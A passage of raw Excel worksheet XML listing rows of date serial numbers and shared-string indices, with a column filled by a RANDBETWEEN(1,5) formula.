      <c r="E19027" s="2" t="s">
        <v>17059</v>
      </c>
      <c r="F19027">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19028" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19028" s="1">
        <v>43150.852824074071</v>
      </c>
      <c r="C19028" t="s">
        <v>2210</v>
      </c>
      <c r="D19028" t="s">
        <v>67</v>
      </c>
      <c r="E19028" s="2" t="s">
        <v>17060</v>
      </c>
      <c r="F19028">
        <f t="shared" ca="1" si="297"/>
        <v>2</v>
      </c>
    </row>
    <row r="19029" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19029" s="1">
        <v>43150.850578703707</v>
      </c>
      <c r="C19029" t="s">
        <v>6</v>
      </c>
      <c r="D19029" t="s">
        <v>821</v>
      </c>
      <c r="E19029" t="s">
        <v>17061</v>
      </c>
      <c r="F19029">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19030" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19030" s="1">
        <v>43150.847210648149</v>
      </c>
      <c r="C19030" t="s">
        <v>2225</v>
      </c>
      <c r="D19030" t="s">
        <v>41</v>
      </c>
      <c r="E19030" s="2" t="s">
        <v>17062</v>
      </c>
      <c r="F19030">
        <f t="shared" ca="1" si="297"/>
        <v>1</v>
      </c>
    </row>
    <row r="19031" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19031" s="1">
        <v>43150.769212962965</v>
      </c>
      <c r="C19031" t="s">
        <v>7491</v>
      </c>
      <c r="D19031" t="s">
        <v>7</v>
      </c>
      <c r="E19031" s="2" t="s">
        <v>17063</v>
      </c>
      <c r="F19031">
        <f t="shared" ca="1" si="297"/>
        <v>4</v>
      </c>
    </row>
    <row r="19032" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19032" s="1">
        <v>43150.758634259262</v>
      </c>
      <c r="C19032" t="s">
        <v>7491</v>
      </c>
      <c r="D19032" t="s">
        <v>1056</v>
      </c>
      <c r="E19032" s="2" t="s">
        <v>17064</v>
      </c>
      <c r="F19032">
        <f t="shared" ca="1" si="297"/>
        <v>3</v>
      </c>
    </row>
    <row r="19033" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19033" s="1">
        <v>43150.723923611113</v>
      </c>
      <c r="C19033" t="s">
        <v>10</v>
      </c>
      <c r="D19033" t="s">
        <v>89</v>
      </c>
      <c r="E19033" s="2" t="s">
        <v>17065</v>
      </c>
      <c r="F19033">
        <f t="shared" ca="1" si="297"/>
        <v>1</v>
      </c>
    </row>
    <row r="19034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19034" s="1">
        <v>43150.656099537038</v>
      </c>
      <c r="C19034" t="s">
        <v>10</v>
      </c>
      <c r="D19034" t="s">
        <v>52</v>
      </c>
      <c r="E19034" t="s">
        <v>17066</v>
      </c>
      <c r="F19034">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19035" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19035" s="1">
        <v>43150.650219907409</v>
      </c>
      <c r="C19035" t="s">
        <v>6</v>
      </c>
      <c r="D19035" t="s">
        <v>194</v>
      </c>
      <c r="E19035" s="2" t="s">
        <v>17067</v>
      </c>
      <c r="F19035">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19036" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19036" s="1">
        <v>43150.647152777776</v>
      </c>
      <c r="C19036" t="s">
        <v>301</v>
      </c>
      <c r="E19036" s="2" t="s">
        <v>17068</v>
      </c>
      <c r="F19036">
        <f t="shared" ca="1" si="297"/>
        <v>3</v>
      </c>
    </row>
    <row r="19037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19037" s="1">
        <v>43150.645752314813</v>
      </c>
      <c r="C19037" t="s">
        <v>6</v>
      </c>
      <c r="D19037" t="s">
        <v>25</v>
      </c>
      <c r="E19037" t="s">
        <v>17069</v>
      </c>
      <c r="F19037">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19038" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19038" s="1">
        <v>43150.635277777779</v>
      </c>
      <c r="C19038" t="s">
        <v>10</v>
      </c>
      <c r="D19038" t="s">
        <v>374</v>
      </c>
      <c r="E19038" t="s">
        <v>17070</v>
      </c>
      <c r="F19038">
        <f t="shared" ca="1" si="297"/>
        <v>1</v>
      </c>
    </row>
    <row r="19039" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19039" s="1">
        <v>43150.613530092596</v>
      </c>
      <c r="C19039" t="s">
        <v>5233</v>
      </c>
      <c r="D19039" t="s">
        <v>20</v>
      </c>
      <c r="E19039" s="2" t="s">
        <v>17071</v>
      </c>
      <c r="F19039">
        <f t="shared" ca="1" si="297"/>
        <v>3</v>
      </c>
    </row>
    <row r="19040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19040" s="1">
        <v>43150.57234953704</v>
      </c>
      <c r="C19040" t="s">
        <v>16</v>
      </c>
      <c r="E19040" t="s">
        <v>17072</v>
      </c>
      <c r="F19040">
        <f t="shared" ca="1" si="297"/>
        <v>2</v>
      </c>
    </row>
    <row r="19041" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19041" s="1">
        <v>43150.516203703701</v>
      </c>
      <c r="C19041" t="s">
        <v>1209</v>
      </c>
      <c r="D19041" t="s">
        <v>374</v>
      </c>
      <c r="E19041" s="2" t="s">
        <v>17073</v>
      </c>
      <c r="F19041">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19042" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19042" s="1">
        <v>43150.498796296299</v>
      </c>
      <c r="C19042" t="s">
        <v>2210</v>
      </c>
      <c r="D19042" t="s">
        <v>56</v>
      </c>
      <c r="E19042" s="2" t="s">
        <v>17060</v>
      </c>
      <c r="F19042">
        <f t="shared" ca="1" si="297"/>
        <v>3</v>
      </c>
    </row>
    <row r="19043" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19043" s="1">
        <v>43150.489768518521</v>
      </c>
      <c r="C19043" t="s">
        <v>260</v>
      </c>
      <c r="E19043" s="2" t="s">
        <v>17074</v>
      </c>
      <c r="F19043">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19044" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19044" s="1">
        <v>43150.471666666665</v>
      </c>
      <c r="C19044" t="s">
        <v>430</v>
      </c>
      <c r="E19044" s="2" t="s">
        <v>17075</v>
      </c>
      <c r="F19044">
        <f t="shared" ca="1" si="297"/>
        <v>3</v>
      </c>
    </row>
    <row r="19045" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19045" s="1">
        <v>43150.468935185185</v>
      </c>
      <c r="C19045" t="s">
        <v>5162</v>
      </c>
      <c r="D19045" t="s">
        <v>1993</v>
      </c>
      <c r="E19045" s="2" t="s">
        <v>17076</v>
      </c>
      <c r="F19045">
        <f t="shared" ca="1" si="297"/>
        <v>1</v>
      </c>
    </row>
    <row r="19046" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19046" s="1">
        <v>43150.46465277778</v>
      </c>
      <c r="C19046" t="s">
        <v>260</v>
      </c>
      <c r="E19046" s="2" t="s">
        <v>17077</v>
      </c>
      <c r="F19046">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19047" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19047" s="1">
        <v>43150.463101851848</v>
      </c>
      <c r="C19047" t="s">
        <v>48</v>
      </c>
      <c r="D19047" t="s">
        <v>312</v>
      </c>
      <c r="E19047" s="2" t="s">
        <v>17078</v>
      </c>
      <c r="F19047">
        <f t="shared" ca="1" si="297"/>
        <v>3</v>
      </c>
    </row>
    <row r="19048" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19048" s="1">
        <v>43150.450752314813</v>
      </c>
      <c r="C19048" t="s">
        <v>2225</v>
      </c>
      <c r="D19048" t="s">
        <v>41</v>
      </c>
      <c r="E19048" s="2" t="s">
        <v>17079</v>
      </c>
      <c r="F19048">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19049" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19049" s="1">
        <v>43150.444768518515</v>
      </c>
      <c r="C19049" t="s">
        <v>10</v>
      </c>
      <c r="D19049" t="s">
        <v>163</v>
      </c>
      <c r="E19049" s="2" t="s">
        <v>17080</v>
      </c>
      <c r="F19049">
        <f t="shared" ca="1" si="297"/>
        <v>4</v>
      </c>
    </row>
    <row r="19050" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19050" s="1">
        <v>43150.442152777781</v>
      </c>
      <c r="C19050" t="s">
        <v>7498</v>
      </c>
      <c r="D19050" t="s">
        <v>36</v>
      </c>
      <c r="E19050" s="2" t="s">
        <v>17081</v>
      </c>
      <c r="F19050">
        <f t="shared" ca="1" si="297"/>
        <v>3</v>
      </c>
    </row>
    <row r="19051" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A19051" s="1">
        <v>43150.432719907411</v>
      </c>
      <c r="C19051" t="s">
        <v>10</v>
      </c>
      <c r="D19051" t="s">
        <v>41</v>
      </c>
      <c r="E19051" s="2" t="s">
        <v>17082</v>
      </c>
      <c r="F19051">
        <f t="shared" ca="1" si="297"/>
        <v>2</v>
      </c>
    </row>
    <row r="19052" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19052" s="1">
        <v>43150.423993055556</v>
      </c>
      <c r="C19052" t="s">
        <v>2225</v>
      </c>
      <c r="D19052" t="s">
        <v>41</v>
      </c>
      <c r="E19052" s="2" t="s">
        <v>17083</v>
      </c>
      <c r="F19052">
        <f t="shared" ca="1" si="297"/>
        <v>2</v>
      </c>
    </row>
    <row r="19053" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A19053" s="1">
        <v>43150.423263888886</v>
      </c>
      <c r="C19053" t="s">
        <v>10</v>
      </c>
      <c r="D19053" t="s">
        <v>41</v>
      </c>
      <c r="E19053" s="2" t="s">
        <v>17084</v>
      </c>
      <c r="F19053">
        <f t="shared" ca="1" si="297"/>
        <v>1</v>
      </c>
    </row>
    <row r="19054" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A19054" s="1">
        <v>43150.421747685185</v>
      </c>
      <c r="C19054" t="s">
        <v>10</v>
      </c>
      <c r="D19054" t="s">
        <v>41</v>
      </c>
      <c r="E19054" s="2" t="s">
        <v>17085</v>
      </c>
      <c r="F19054">
        <f t="shared" ca="1" si="297"/>
        <v>4</v>
      </c>
    </row>
    <row r="19055" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19055" s="1">
        <v>43150.398506944446</v>
      </c>
      <c r="C19055" t="s">
        <v>559</v>
      </c>
      <c r="E19055" s="2" t="s">
        <v>17086</v>
      </c>
      <c r="F19055">
        <f t="shared" ca="1" si="297"/>
        <v>2</v>
      </c>
    </row>
    <row r="19056" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19056" s="1">
        <v>43150.382314814815</v>
      </c>
      <c r="C19056" t="s">
        <v>16</v>
      </c>
      <c r="E19056" s="2" t="s">
        <v>17087</v>
      </c>
      <c r="F19056">
        <f t="shared" ca="1" si="297"/>
        <v>2</v>
      </c>
    </row>
    <row r="19057" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19057" s="1">
        <v>43150.308738425927</v>
      </c>
      <c r="C19057" t="s">
        <v>10</v>
      </c>
      <c r="D19057" t="s">
        <v>89</v>
      </c>
      <c r="F19057">
        <f t="shared" ca="1" si="297"/>
        <v>4</v>
      </c>
    </row>
    <row r="19058" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19058" s="1">
        <v>43150.299745370372</v>
      </c>
      <c r="C19058" t="s">
        <v>10295</v>
      </c>
      <c r="E19058" t="s">
        <v>17088</v>
      </c>
      <c r="F19058">
        <f t="shared" ca="1" si="297"/>
        <v>3</v>
      </c>
    </row>
    <row r="19059" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A19059" s="1">
        <v>43150.277604166666</v>
      </c>
      <c r="C19059" t="s">
        <v>724</v>
      </c>
      <c r="D19059" t="s">
        <v>713</v>
      </c>
      <c r="E19059" s="2" t="s">
        <v>17089</v>
      </c>
      <c r="F19059">
        <f t="shared" ca="1" si="297"/>
        <v>2</v>
      </c>
    </row>
    <row r="19060" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19060" s="1">
        <v>43150.26085648148</v>
      </c>
      <c r="C19060" t="s">
        <v>48</v>
      </c>
      <c r="E19060" s="2" t="s">
        <v>17090</v>
      </c>
      <c r="F19060">
        <f t="shared" ca="1" si="297"/>
        <v>4</v>
      </c>
    </row>
    <row r="19061" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19061" s="1">
        <v>43150.258043981485</v>
      </c>
      <c r="C19061" t="s">
        <v>731</v>
      </c>
      <c r="D19061" t="s">
        <v>885</v>
      </c>
      <c r="E19061" s="2" t="s">
        <v>17091</v>
      </c>
      <c r="F19061">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19062" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19062" s="1">
        <v>43150.24695601852</v>
      </c>
      <c r="C19062" t="s">
        <v>48</v>
      </c>
      <c r="E19062" t="s">
        <v>17092</v>
      </c>
      <c r="F19062">
        <f t="shared" ca="1" si="297"/>
        <v>4</v>
      </c>
    </row>
    <row r="19063" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19063" s="1">
        <v>43150.238495370373</v>
      </c>
      <c r="C19063" t="s">
        <v>1501</v>
      </c>
      <c r="D19063" t="s">
        <v>312</v>
      </c>
      <c r="E19063" s="2" t="s">
        <v>17093</v>
      </c>
      <c r="F19063">
        <f t="shared" ca="1" si="297"/>
        <v>4</v>
      </c>
    </row>
    <row r="19064" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19064" s="1">
        <v>43150.230185185188</v>
      </c>
      <c r="C19064" t="s">
        <v>43</v>
      </c>
      <c r="D19064" t="s">
        <v>2139</v>
      </c>
      <c r="E19064" s="2" t="s">
        <v>17094</v>
      </c>
      <c r="F19064">
        <f t="shared" ca="1" si="297"/>
        <v>1</v>
      </c>
    </row>
    <row r="19065" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19065" s="1">
        <v>43150.200231481482</v>
      </c>
      <c r="C19065" t="s">
        <v>5233</v>
      </c>
      <c r="D19065" t="s">
        <v>194</v>
      </c>
      <c r="E19065" s="2" t="s">
        <v>17095</v>
      </c>
      <c r="F19065">
        <f t="shared" ca="1" si="297"/>
        <v>4</v>
      </c>
    </row>
    <row r="19066" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19066" s="1">
        <v>43150.188773148147</v>
      </c>
      <c r="C19066" t="s">
        <v>166</v>
      </c>
      <c r="E19066" t="s">
        <v>17096</v>
      </c>
      <c r="F19066">
        <f t="shared" ca="1" si="297"/>
        <v>4</v>
      </c>
    </row>
    <row r="19067" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19067" s="1">
        <v>43150.14439814815</v>
      </c>
      <c r="C19067" t="s">
        <v>1501</v>
      </c>
      <c r="E19067" t="s">
        <v>17097</v>
      </c>
      <c r="F19067">
        <f t="shared" ca="1" si="297"/>
        <v>2</v>
      </c>
    </row>
    <row r="19068" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19068" s="1">
        <v>43150.102847222224</v>
      </c>
      <c r="C19068" t="s">
        <v>1077</v>
      </c>
      <c r="D19068" t="s">
        <v>25</v>
      </c>
      <c r="E19068" s="2" t="s">
        <v>17098</v>
      </c>
      <c r="F19068">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19069" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19069" s="1">
        <v>43150.094467592593</v>
      </c>
      <c r="C19069" t="s">
        <v>41</v>
      </c>
      <c r="E19069" t="s">
        <v>17099</v>
      </c>
      <c r="F19069">
        <f t="shared" ca="1" si="297"/>
        <v>2</v>
      </c>
    </row>
    <row r="19070" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19070" s="1">
        <v>43150.083148148151</v>
      </c>
      <c r="C19070" t="s">
        <v>1077</v>
      </c>
      <c r="D19070" t="s">
        <v>52</v>
      </c>
      <c r="E19070" s="2" t="s">
        <v>17100</v>
      </c>
      <c r="F19070">
        <f t="shared" ca="1" si="297"/>
        <v>3</v>
      </c>
    </row>
    <row r="19071" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19071" s="1">
        <v>43150.034409722219</v>
      </c>
      <c r="C19071" t="s">
        <v>41</v>
      </c>
      <c r="E19071" t="s">
        <v>17101</v>
      </c>
      <c r="F19071">
        <f t="shared" ca="1" si="297"/>
        <v>5</v>
      </c>
    </row>
    <row r="19072" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19072" s="1">
        <v>43150.017013888886</v>
      </c>
      <c r="C19072" t="s">
        <v>1077</v>
      </c>
      <c r="D19072" t="s">
        <v>52</v>
      </c>
      <c r="E19072" s="2" t="s">
        <v>17102</v>
      </c>
      <c r="F19072">
        <f t="shared" ca="1" si="297"/>
        <v>2</v>
      </c>
    </row>
    <row r="19073" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19073" s="1">
        <v>43150.001886574071</v>
      </c>
      <c r="C19073" t="s">
        <v>86</v>
      </c>
      <c r="D19073" t="s">
        <v>271</v>
      </c>
      <c r="E19073" s="2" t="s">
        <v>17103</v>
      </c>
      <c r="F19073">
        <f t="shared" ca="1" si="297"/>
        <v>1</v>
      </c>
    </row>
    <row r="19074" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A19074" s="1">
        <v>43149.999085648145</v>
      </c>
      <c r="C19074" t="s">
        <v>471</v>
      </c>
      <c r="D19074" t="s">
        <v>192</v>
      </c>
      <c r="E19074" s="2" t="s">
        <v>17104</v>
      </c>
      <c r="F19074">
        <f t="shared" ref="F19074:F19137" ca="1" si="298">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="19075" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19075" s="1">
        <v>43149.963564814818</v>
      </c>
      <c r="C19075" t="s">
        <v>1077</v>
      </c>
      <c r="D19075" t="s">
        <v>41</v>
      </c>
      <c r="E19075" s="2" t="s">
        <v>17105</v>
      </c>
      <c r="F19075">
        <f t="shared" ca="1" si="298"/>
        <v>4</v>
      </c>
    </row>
    <row r="19076" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19076" s="1">
        <v>43149.957546296297</v>
      </c>
      <c r="C19076" t="s">
        <v>260</v>
      </c>
      <c r="E19076" t="s">
        <v>17106</v>
      </c>
      <c r="F19076">
        <f t="shared" ca="1" si="298"/>
        <v>1</v>
      </c>
    </row>
    <row r="19077" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19077" s="1">
        <v>43149.879374999997</v>
      </c>
      <c r="C19077" t="s">
        <v>41</v>
      </c>
      <c r="E19077" s="2" t="s">
        <v>17107</v>
      </c>
      <c r="F19077">
        <f t="shared" ca="1" si="298"/>
        <v>1</v>
      </c>
    </row>
    <row r="19078" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19078" s="1">
        <v>43149.831701388888</v>
      </c>
      <c r="C19078" t="s">
        <v>140</v>
      </c>
      <c r="D19078" t="s">
        <v>234</v>
      </c>
      <c r="E19078" t="s">
        <v>17108</v>
      </c>
      <c r="F19078">
        <f t="shared" ca="1" si="298"/>
        <v>5</v>
      </c>
    </row>
    <row r="19079" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19079" s="1">
        <v>43149.737662037034</v>
      </c>
      <c r="C19079" t="s">
        <v>1812</v>
      </c>
      <c r="D19079" t="s">
        <v>56</v>
      </c>
      <c r="E19079" s="2" t="s">
        <v>17109</v>
      </c>
      <c r="F19079">
        <f t="shared" ca="1" si="298"/>
        <v>2</v>
      </c>
    </row>
    <row r="19080" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19080" s="1">
        <v>43149.712094907409</v>
      </c>
      <c r="C19080" t="s">
        <v>1209</v>
      </c>
      <c r="D19080" t="s">
        <v>1091</v>
      </c>
      <c r="E19080" s="2" t="s">
        <v>17110</v>
      </c>
      <c r="F19080">
        <f t="shared" ca="1" si="298"/>
        <v>2</v>
      </c>
    </row>
    <row r="19081" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19081" s="1">
        <v>43149.707743055558</v>
      </c>
      <c r="C19081" t="s">
        <v>5233</v>
      </c>
      <c r="D19081" t="s">
        <v>336</v>
      </c>
      <c r="E19081" s="2" t="s">
        <v>17111</v>
      </c>
      <c r="F19081">
        <f t="shared" ca="1" si="298"/>
        <v>1</v>
      </c>
    </row>
    <row r="19082" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19082" s="1">
        <v>43149.559398148151</v>
      </c>
      <c r="C19082" t="s">
        <v>10</v>
      </c>
      <c r="D19082" t="s">
        <v>36</v>
      </c>
      <c r="F19082">
        <f t="shared" ca="1" si="298"/>
        <v>5</v>
      </c>
    </row>
    <row r="19083" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19083" s="1">
        <v>43149.553356481483</v>
      </c>
      <c r="C19083" t="s">
        <v>2225</v>
      </c>
      <c r="D19083" t="s">
        <v>41</v>
      </c>
      <c r="E19083" s="2" t="s">
        <v>17112</v>
      </c>
      <c r="F19083">
        <f t="shared" ca="1" si="298"/>
        <v>1</v>
      </c>
    </row>
    <row r="19084" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19084" s="1">
        <v>43149.509976851848</v>
      </c>
      <c r="C19084" t="s">
        <v>731</v>
      </c>
      <c r="E19084" t="s">
        <v>17113</v>
      </c>
      <c r="F19084">
        <f t="shared" ca="1" si="298"/>
        <v>5</v>
      </c>
    </row>
    <row r="19085" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19085" s="1">
        <v>43149.486875000002</v>
      </c>
      <c r="C19085" t="s">
        <v>10</v>
      </c>
      <c r="D19085" t="s">
        <v>244</v>
      </c>
      <c r="E19085" t="s">
        <v>17114</v>
      </c>
      <c r="F19085">
        <f t="shared" ca="1" si="298"/>
        <v>2</v>
      </c>
    </row>
    <row r="19086" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19086" s="1">
        <v>43149.473773148151</v>
      </c>
      <c r="C19086" t="s">
        <v>1209</v>
      </c>
      <c r="D19086" t="s">
        <v>112</v>
      </c>
      <c r="E19086" s="2" t="s">
        <v>17115</v>
      </c>
      <c r="F19086">
        <f t="shared" ca="1" si="298"/>
        <v>3</v>
      </c>
    </row>
    <row r="19087" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19087" s="1">
        <v>43149.414699074077</v>
      </c>
      <c r="C19087" t="s">
        <v>559</v>
      </c>
      <c r="E19087" t="s">
        <v>17116</v>
      </c>
      <c r="F19087">
        <f t="shared" ca="1" si="298"/>
        <v>5</v>
      </c>
    </row>
    <row r="19088" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19088" s="1">
        <v>43149.349675925929</v>
      </c>
      <c r="C19088" t="s">
        <v>17</v>
      </c>
      <c r="E19088" s="2" t="s">
        <v>17117</v>
      </c>
      <c r="F19088">
        <f t="shared" ca="1" si="298"/>
        <v>1</v>
      </c>
    </row>
    <row r="19089" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19089" s="1">
        <v>43149.326550925929</v>
      </c>
      <c r="C19089" t="s">
        <v>292</v>
      </c>
      <c r="E19089" t="s">
        <v>17118</v>
      </c>
      <c r="F19089">
        <f t="shared" ca="1" si="298"/>
        <v>2</v>
      </c>
    </row>
    <row r="19090" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19090" s="1">
        <v>43149.279606481483</v>
      </c>
      <c r="C19090" t="s">
        <v>318</v>
      </c>
      <c r="E19090" s="2" t="s">
        <v>17119</v>
      </c>
      <c r="F19090">
        <f t="shared" ca="1" si="298"/>
        <v>1</v>
      </c>
    </row>
    <row r="19091" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19091" s="1">
        <v>43149.26902777778</v>
      </c>
      <c r="C19091" t="s">
        <v>1611</v>
      </c>
      <c r="D19091" t="s">
        <v>232</v>
      </c>
      <c r="E19091" s="2" t="s">
        <v>17120</v>
      </c>
      <c r="F19091">
        <f t="shared" ca="1" si="298"/>
        <v>3</v>
      </c>
    </row>
    <row r="19092" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19092" s="1">
        <v>43149.211736111109</v>
      </c>
      <c r="C19092" t="s">
        <v>1209</v>
      </c>
      <c r="D19092" t="s">
        <v>817</v>
      </c>
      <c r="E19092" s="2" t="s">
        <v>17121</v>
      </c>
      <c r="F19092">
        <f t="shared" ca="1" si="298"/>
        <v>5</v>
      </c>
    </row>
    <row r="19093" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19093" s="1">
        <v>43149.026284722226</v>
      </c>
      <c r="C19093" t="s">
        <v>318</v>
      </c>
      <c r="E19093" t="s">
        <v>17122</v>
      </c>
      <c r="F19093">
        <f t="shared" ca="1" si="298"/>
        <v>1</v>
      </c>
    </row>
    <row r="19094" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19094" s="1">
        <v>43148.990300925929</v>
      </c>
      <c r="C19094" t="s">
        <v>5233</v>
      </c>
      <c r="D19094" t="s">
        <v>20</v>
      </c>
      <c r="E19094" s="2" t="s">
        <v>17123</v>
      </c>
      <c r="F19094">
        <f t="shared" ca="1" si="298"/>
        <v>2</v>
      </c>
    </row>
    <row r="19095" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19095" s="1">
        <v>43148.919953703706</v>
      </c>
      <c r="C19095" t="s">
        <v>1812</v>
      </c>
      <c r="D19095" t="s">
        <v>56</v>
      </c>
      <c r="E19095" s="2" t="s">
        <v>17124</v>
      </c>
      <c r="F19095">
        <f t="shared" ca="1" si="298"/>
        <v>2</v>
      </c>
    </row>
    <row r="19096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19096" s="1">
        <v>43148.903136574074</v>
      </c>
      <c r="C19096" t="s">
        <v>10</v>
      </c>
      <c r="D19096" t="s">
        <v>17</v>
      </c>
      <c r="E19096" t="s">
        <v>17125</v>
      </c>
      <c r="F19096">
        <f t="shared" ca="1" si="298"/>
        <v>3</v>
      </c>
    </row>
    <row r="19097" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19097" s="1">
        <v>43148.890266203707</v>
      </c>
      <c r="C19097" t="s">
        <v>5233</v>
      </c>
      <c r="D19097" t="s">
        <v>7</v>
      </c>
      <c r="E19097" s="2" t="s">
        <v>17126</v>
      </c>
      <c r="F19097">
        <f t="shared" ca="1" si="298"/>
        <v>5</v>
      </c>
    </row>
    <row r="19098" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19098" s="1">
        <v>43148.791863425926</v>
      </c>
      <c r="C19098" t="s">
        <v>5233</v>
      </c>
      <c r="D19098" t="s">
        <v>1993</v>
      </c>
      <c r="E19098" s="2" t="s">
        <v>17127</v>
      </c>
      <c r="F19098">
        <f t="shared" ca="1" si="298"/>
        <v>3</v>
      </c>
    </row>
    <row r="19099" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19099" s="1">
        <v>43148.770798611113</v>
      </c>
      <c r="C19099" t="s">
        <v>1611</v>
      </c>
      <c r="D19099" t="s">
        <v>11</v>
      </c>
      <c r="E19099" s="2" t="s">
        <v>17128</v>
      </c>
      <c r="F19099">
        <f t="shared" ca="1" si="298"/>
        <v>2</v>
      </c>
    </row>
    <row r="19100" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19100" s="1">
        <v>43148.75576388889</v>
      </c>
      <c r="C19100" t="s">
        <v>1209</v>
      </c>
      <c r="D19100" t="s">
        <v>229</v>
      </c>
      <c r="E19100" s="2" t="s">
        <v>17129</v>
      </c>
      <c r="F19100">
        <f t="shared" ca="1" si="298"/>
        <v>5</v>
      </c>
    </row>
    <row r="19101" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19101" s="1">
        <v>43148.738935185182</v>
      </c>
      <c r="C19101" t="s">
        <v>10</v>
      </c>
      <c r="D19101" t="s">
        <v>6</v>
      </c>
      <c r="E19101" s="2" t="s">
        <v>17130</v>
      </c>
      <c r="F19101">
        <f t="shared" ca="1" si="298"/>
        <v>3</v>
      </c>
    </row>
    <row r="19102" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19102" s="1">
        <v>43148.614814814813</v>
      </c>
      <c r="C19102" t="s">
        <v>1611</v>
      </c>
      <c r="D19102" t="s">
        <v>80</v>
      </c>
      <c r="E19102" s="2" t="s">
        <v>17131</v>
      </c>
      <c r="F19102">
        <f t="shared" ca="1" si="298"/>
        <v>3</v>
      </c>
    </row>
    <row r="19103" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19103" s="1">
        <v>43148.608761574076</v>
      </c>
      <c r="C19103" t="s">
        <v>1209</v>
      </c>
      <c r="D19103" t="s">
